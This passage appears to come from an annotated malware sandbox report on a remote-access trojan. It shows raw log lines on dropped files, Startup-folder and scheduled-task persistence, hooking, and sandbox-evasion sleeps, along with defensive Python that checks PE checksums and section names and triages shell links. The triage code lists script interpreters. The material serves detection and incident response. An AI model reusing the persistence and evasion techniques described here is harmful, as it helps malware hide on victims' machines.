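# allow-list for this example. ".didata" is Delphi's delay-load import section seen in
# DZIPR.exe above and is legitimate on its own; anything outside the set deserves a look.
KNOWN_SECTIONS = {
    ".text", ".rdata", ".data", ".idata", ".edata", ".pdata", ".rsrc", ".reloc",
    ".bss", ".tls", ".CRT", ".gfids", ".00cfg", ".itext", ".didata",
}


def _pe_header_offset(data: bytes) -> int:
    """Return e_lfanew after validating the MZ and PE signatures."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    return e_lfanew


def checksum_field_offset(data: bytes) -> int:
    """File offset of OptionalHeader.CheckSum.

    PE signature (4) + COFF file header (20) = start of the optional header;
    CheckSum sits at +0x40 in both PE32 (magic 0x10B) and PE32+ (magic 0x20B).
    """
    return _pe_header_offset(data) + 4 + 20 + 0x40


def pe_checksum(data: bytes) -> int:
    """Recompute the image checksum the way imagehlp!MapFileAndCheckSum does.

    Sum the file as little-endian DWORDs (zero-padded to a multiple of 4) with
    end-around carry, skipping the DWORD that holds CheckSum itself, fold the
    result to 16 bits and add the file length.
    """
    skip = checksum_field_offset(data) & ~3
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def verify_checksum(data: bytes) -> dict:
    """Stored CheckSum vs recomputed one: the report's 'real checksum' vs 'should be'."""
    stored = struct.unpack_from("<I", data, checksum_field_offset(data))[0]
    computed = pe_checksum(data)
    return {"stored": stored, "computed": computed, "matches": stored == computed}


def section_names(data: bytes) -> list:
    """Read the 8-byte names from the section table."""
    pe = _pe_header_offset(data)
    n_sections = struct.unpack_from("<H", data, pe + 6)[0]    # COFF.NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]     # COFF.SizeOfOptionalHeader
    table = pe + 4 + 20 + opt_size
    return [
        data[table + i * 40: table + i * 40 + 8].rstrip(b"\0").decode("latin-1")
        for i in range(n_sections)
    ]


def unusual_sections(data: bytes) -> list:
    """Section names not produced by a known linker (e.g. 'cmxvoc' in the report)."""
    return [name for name in section_names(data) if name not in KNOWN_SECTIONS]


def build_toy_pe(stored_checksum: int = 0, sections=(".text", "cmxvoc")) -> bytes:
    """Constructed, non-runnable PE32 skeleton used only to exercise the checks above."""
    buf = bytearray(0x138 + 40 * len(sections))
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)                    # e_lfanew
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HH", buf, 0x44, 0x14C, len(sections))   # Machine=i386, NumberOfSections
    struct.pack_into("<HH", buf, 0x54, 0xE0, 0x0102)           # SizeOfOptionalHeader, Characteristics
    struct.pack_into("<H", buf, 0x58, 0x10B)                   # PE32 magic
    struct.pack_into("<I", buf, 0x98, stored_checksum)         # OptionalHeader.CheckSum
    for i, name in enumerate(sections):
        buf[0x138 + 40 * i: 0x138 + 40 * i + 8] = name.encode().ljust(8, b"\0")
    return bytes(buf)


if __name__ == "__main__":
    sample = build_toy_pe()
    r = verify_checksum(sample)
    print(f"real checksum: {r['stored']:#x} should be: {r['computed']:#x}")
    print("non-standard sections:", unusual_sections(sample))
```

Read the result the way the report does. A stored CheckSum of 0x0 is what most linkers write for user-mode images unless told to fill it (MSVC /RELEASE), so "real checksum: 0x0" on its own is weak evidence; a nonzero stored value that disagrees, as with DZIPR.dll's 0x601f9 against 0x5ee7e, means the bytes changed after the linker ran (patched, appended to, or re-packed). Windows validates the checksum only for kernel-mode images and a few system components, so a wrong value never stops a user-mode executable from running. The arithmetic above is the same as pefile's generate_checksum() if a library is preferred.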
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00411C20 push eax; ret 16_2_00411C4E
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA55401 push ecx; ret 17_2_6FA55414
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA551A1 push ecx; ret 17_2_6FA551B4
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C525401 push ecx; ret 18_2_6C525414
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C5251A1 push ecx; ret 18_2_6C5251B4
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAD5401 push ecx; ret 23_2_6FAD5414
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAD51A1 push ecx; ret 23_2_6FAD51B4

Persistence and Installation Behavior

Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe
Source: C:\Users\user\DZIPR.exe File created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\AUGUST.exe Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\qapuwvr Jump to dropped file
Source: C:\Users\user\AppData\Roaming\AUGUST.exe File created: C:\Users\user\DZIPR.dll Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\demhwk Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\gps Jump to dropped file
Source: C:\Users\user\AppData\Roaming\AUGUST.exe File created: C:\Users\user\DZIPR.exe Jump to dropped file
Source: C:\Users\user\DZIPR.exe File created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\AUGUST.exe File created: C:\Users\user\DZIPR.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\AUGUST.exe File created: C:\Users\user\DZIPR.exe Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\demhwk Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\qapuwvr Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\gps Jump to dropped file

Boot Survival

Source: C:\Users\user\AppData\Roaming\AUGUST.exe File created: C:\Users\user\DZIPR.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\AUGUST.exe File created: C:\Users\user\DZIPR.exe Jump to dropped file
Source: C:\Windows\System32\svchost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT2369.tmp Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Windows\Tasks\lnfast_x64.job Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT2369.tmp Jump to behavior
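
Two Startup-folder shortcuts in this report (uvnhjq and BIT2369.tmp) point at ..\..\Roaming\Ruy_driverv2\DZIPR.exe, and the Boot Survival lines above show BIT2369.tmp being written by svchost.exe. The BITnnnn.tmp name is the temporary-file convention of the BITS service, which is consistent with the Startup entry having been placed by a BITS transfer rather than by the RAT process itself; lnfast_x64.job in C:\Windows\Tasks is a second persistence point to collect alongside it. The Python below is an added example for this page, not code from the report's vendor or from the sample: a minimal MS-SHLLINK parser that pulls RELATIVE_PATH, the arguments and ShowCommand out of a shell link, plus the triage heuristics a responder would run over every file in the Startup folder regardless of extension, since the link here carried a .tmp name. The build_lnk helper, the sample paths and the heuristic lists are constructed for the example.

```python
import struct
from pathlib import Path

# ShellLinkHeader constants from MS-SHLLINK 2.1
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINIMIZED, SW_SHOWMINNOACTIVE = 2, 7      # ShowCommand values that keep the window out of sight
STRING_FIELDS = [                                # StringData order is fixed by the spec
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon_location"),
]

# Constructed heuristic lists for this example.
PROFILE_DIRS = ("\\appdata\\", "\\roaming\\", "\\local\\temp\\", "\\users\\public\\", "\\programdata\\")
INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "wscript", "cscript", "mshta", "rundll32", "regsvr32")


def is_shell_link(data: bytes) -> bool:
    """HeaderSize must be 0x4C and the CLSID must be the shell-link CLSID."""
    return (len(data) >= 0x4C
            and struct.unpack_from("<I", data, 0)[0] == 0x4C
            and data[4:20] == LNK_CLSID)


def parse_lnk(data: bytes) -> dict:
    """Parse the header and StringData of a .lnk; the IDList and LinkInfo are skipped."""
    if not is_shell_link(data):
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]      # IDListSize + IDList
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]          # LinkInfoSize covers the whole block
    info = {"flags": flags, "show_command": show_command}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]         # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            info[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            info[name] = data[pos:pos + count].decode("latin-1")
            pos += count
    return info


def triage(info: dict) -> list:
    """Why a Startup-folder link deserves attention; an empty list means nothing flagged."""
    reasons = []
    target = info.get("relative_path", "").lower()
    args = info.get("arguments", "").lower()
    if any(d in target for d in PROFILE_DIRS):
        reasons.append("target resolves into a user-writable profile directory")
    if info["show_command"] in (SW_SHOWMINIMIZED, SW_SHOWMINNOACTIVE):
        reasons.append("window minimized or hidden at launch")
    basename = target.rsplit("\\", 1)[-1]
    if any(i in basename or i in args for i in INTERPRETERS):
        reasons.append("launches a script or command interpreter")
    return reasons


def scan_startup(folder: str) -> list:
    """Try every regular file, whatever its extension; BIT2369.tmp above was a shell link."""
    findings = []
    for path in sorted(Path(folder).iterdir()):
        if not path.is_file():
            continue
        data = path.read_bytes()
        if is_shell_link(data):
            info = parse_lnk(data)
            findings.append((path.name, info.get("relative_path"), triage(info)))
    return findings


def build_lnk(relative_path: str, arguments: str = None, show_command: int = 1) -> bytes:
    """Constructed minimal .lnk (header plus Unicode StringData) used to exercise the parser."""
    flags = HAS_RELATIVE_PATH | IS_UNICODE | (HAS_ARGUMENTS if arguments is not None else 0)
    header = bytearray(0x4C)
    struct.pack_into("<I", header, 0, 0x4C)
    header[4:20] = LNK_CLSID
    struct.pack_into("<I", header, 20, flags)
    struct.pack_into("<I", header, 60, show_command)
    body = b""
    for s in (relative_path, arguments):
        if s is not None:
            body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return bytes(header) + body


if __name__ == "__main__":
    info = parse_lnk(build_lnk(r"..\..\Roaming\Ruy_driverv2\DZIPR.exe"))
    print(info["relative_path"], triage(info))
```

The relative path is what the sandbox reports as "LNK file:"; the same bytes are what Explorer resolves on logon, so the RELATIVE_PATH string is the persistence target even when the link also carries an IDList. On a live host, run scan_startup against %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup and the all-users folder under %ProgramData%, and treat any parsed link whose file name is not .lnk as an indicator in itself.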

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\cmd.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\DEMHWK
Source: C:\Windows\SysWOW64\cmd.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\QAPUWVR
Source: C:\Windows\SysWOW64\cmd.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\GPS
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA4DE29 IsIconic,GetWindowPlacement,GetWindowRect, 17_2_6FA4DE29
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C51DE29 IsIconic,GetWindowPlacement,GetWindowRect, 18_2_6C51DE29
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FACDE29 IsIconic,GetWindowPlacement,GetWindowRect, 23_2_6FACDE29
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
(the preceding powershell.exe observation is recorded a further 160 times in the full report; repeats collapsed)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\DZIPR.exe API/Special instruction interceptor: Address: 6C5B7C44
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe API/Special instruction interceptor: Address: 6C5B7C44
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe API/Special instruction interceptor: Address: 6C5B7945
Source: C:\Windows\SysWOW64\cmd.exe API/Special instruction interceptor: Address: 6C5B3B54
Source: C:\Windows\SysWOW64\explorer.exe API/Special instruction interceptor: Address: 8FA317
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3631
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4211
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3046
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2607
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4872
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2554
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7635
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2050
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qapuwvr
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\demhwk
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gps
Source: C:\Users\user\DZIPR.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\DZIPR.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\DZIPR.exe API coverage: 4.4 %
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe API coverage: 4.6 %
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe API coverage: 3.9 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516 Thread sleep count: 3631 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4188 Thread sleep count: 4211 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3000 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1476 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3820 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3220 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6312 Thread sleep count: 3046 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6312 Thread sleep count: 2607 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3004 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5896 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6636 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6124 Thread sleep count: 4872 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2064 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7016 Thread sleep count: 2554 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5616 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5956 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5044 Thread sleep count: 7635 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4864 Thread sleep count: 2050 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6284 Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5692 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4392 Thread sleep time: -30000s >= -30000s
